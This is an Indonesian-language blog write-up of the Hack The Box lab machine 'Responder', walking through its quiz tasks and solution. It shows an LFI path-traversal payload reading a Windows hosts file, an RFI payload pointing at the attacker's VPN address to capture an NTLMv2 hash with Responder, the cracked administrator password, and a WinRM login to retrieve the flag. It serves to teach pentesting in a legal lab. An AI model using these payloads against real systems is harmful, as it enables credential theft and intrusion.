Hack The Box — Responder (Bahasa Indonesia)

Alex
6 min readJan 27, 2023
Responder Box — Hack The Box

Yoh! Jumpa lagi di artikel saya.

Kali ini saya akan bahas WriteUp (WU) dari salah satu room atau machine (Windows) Starting Point — Tier 1 di Hack The Box (HTB), yaitu Responder. Walaupun mesin ini digolongkan sebagai very easy, tapi, bukan berarti kita tidak belajar sama sekali dari mesin tersebut kan? Apalagi buat yang baru belajar di dunia pentesting…

Oke. Sebelum lanjut, pastikan:

  1. Sudah terkoneksi ke VPN htb atau masuk ke mesin Pwnbox-nya (btw kalau akun free, waktu pemakaian pwnbox-nya terbatas yak).
  2. Sudah menyalakan mesin dan mendapatkan IP-nya.
Alamat IP target mesin saya

Kita mulai…

Task 1

  • When visiting the web service using the IP address, what is the domain that we are being redirected to?

Disini kita diminta untuk mengakses alamat IP-nya supaya kita bisa tau domain name apa yang digunakan untuk menggantikan IP tersebut. Tapi, karena ketika saya kunjungi di firefox malah ke redirect ke situs mercusuar (wkwk), jadi, mari kita dapatkan domainnya pake tool whatweb aja kalau gitu.

unika.htb

Domain-nya adalah unika.htb. Tinggal kita tambahkan di file /etc/hosts.

menambahkan IP dan host (unika.htb) di /etc/hosts

Dan kita sudah bisa mengakses domain tersebut di browser.

akses http://unika.htb di firefox
  • Taks 2

Which scripting language is being used on the server to generate webpages?

Scripting language apa yang digunakan pada halaman web tersebut?

Jawabannya bisa kita lihat di Task 1 tadi, yaitu PHP.

  • Task 3

What is the name of the URL parameter which is used to load different language versions of the webpage?

Apa parameter URL yang digunakan untuk mengubah bahasa pada website tersebut?

Kita bisa pastikan dengan mengklik menu (EN) dan mengganti bahasa pada halaman http://unika.htb tersebut (ada 2 kode bahasa di sana, yaitu DE:Jerman dan FR:Perancis, coba aja salah satunya) untuk dapat mengetahui parameter yang digunakan. Misalnya, saya mengubah bahasanya ke bahasa Jerman (DE).

parameter

Dapat diketahui, parameter yang digunakan untuk mengganti bahasa adalah ‘page’.

  • Task 4

Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

Manakah value untuk parameter ‘page’ tadi yang dapat digunakan untuk mengeksploitasi kerentanan LFI?

Jawabannya adalah ../../../../../../../../windows/system32/drivers/etc/hosts karena kita dapat mengetahui isi file /windows/system32/drivers/etc/hosts ketika menginputkan value tersebut di parameter ‘page’ tadi. Mari kita buktikan…

?page=/windows/system32/drivers/etc/hosts

Referensi tentang LFI

source: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion

Atau ada banyak juga yang menjelaskan tentang RFI di Youtube, salah satu yang cukup baik (dan berbahasa Indonesia) adalah sebagai berikut:

  • Task 5

Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

Manakah contoh value untuk parameter ‘page’ tadi yang dapat digunakan untuk mengeksploitasi kerentanan RFI?

Jawabannya adalah //10.10.14.6/somefile.

?page=//10.10.14.6/somefile

Referensi tentang RFI:

source: https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion

Atau ada banyak juga yang menjelaskan tentang RFI di Youtube, salah satu yang cukup baik (dan berbahasa Indonesia) adalah sebagai berikut:

  • Task 6

What does NTLM stand for?

Apa kepanjangan NTLM?

Tinggal googling kalau ndak tau…

NTLM (New Technology LAN Manager)
  • Task 7

Which flag do we use in the Responder utility to specify the network interface?

Flag/Tag apa yang digunakan di (tool) Responder untuk menentukan network interface.

Bagi yang penasaran tentang responder, mungkin bisa baca-baca dari sumber-sumber berikut…

About Responder, source: https://github.com/lgandx/Responder
responder, source: https://www.kali.org/tools/responder/

Tinggal buka manual atau help Responder. Di kali linux, Responder sudah ada, atau kalau mau diinstall tinggal ketikkan perintah ‘sudo apt install responder’.

responder

Di sini, kita langsung aja intercept jaringan di interface vpn htb (tun0) dengan Responder, lalu kita eskploitasi kerentanan RFI tadi untuk mendapatkan kredensial login nanti.

IP tun0 saya
responder sedang listening…

Pada parameter ‘page’ tadi, kita masukkan payload berikut:

//$IP-tun0/apapun

Karena kebetulan IP tun0 saya adalah 10.10.14.47, maka, saya inputkan payload berikut di URL-nya..

exploit RFI
get the credential — user:password (NTLMv2 hashed)
  • Task 8

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?.

Salah satu tool password cracking yang terkenal adalah john, tapi, apa nama panjangnya?

John The Ripper
  • Task 9

What is the password for the administrator user?

Apa password dari user administrator tadi?

Saatnya pake jasa om john…

Administrator:badminton
  • Task 10

We’ll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

Ada sebuah service atau layanan yang tersedia di box Responder yang dapat digunakan untuk melakukan remote access menggunakan kredensial yang sudah kita dapatkan tadi (Administrator:badminton). Di port berapakah layanan tersebut berjalan?

Liat hasil nmap :)

port 5985

Sebenarnya, service apa sih yang running di port 5985 itu? Barangkali ada yang penasaran, berikut sedikit infonya…

source: https://book.hacktricks.xyz/network-services-pentesting/5985-5986-pentesting-winrm
  • Submit Flag

Submit root flag

Untuk dapet flagnya, kita perlu masuk dulu ke mesin Responder via port 5985 tadi menggunakan tool evil-winrm. Di kali udah ada, atau kalau mau diinstall, tinggal ketikkan perintah ‘sudo apt install evil-winrm’.

Setelah login, biar saya mudah mencari flag-nya karena saya juga sudah tau flag-nya pasti tersimpan di file flag.txt saya akan coba cari langsung file flag.txt tadi dengan perintah Get-ChildItem. Contohnya liat dari sini:

source: https://devblogs.microsoft.com/scripting/use-windows-powershell-to-search-for-files/
flag.txt
Machine Pwned!

Wokkeehh, sekian dulu buat pembahasan room Responder — Hack The Box kali ini.

Kita akan jumpa lagi (jika masih ada umur) di lain kesempatan.

See You When You See Me! ^ ^

wkwkwk

--

--

Alex

A college student. A writer. Cyber security enthusiast.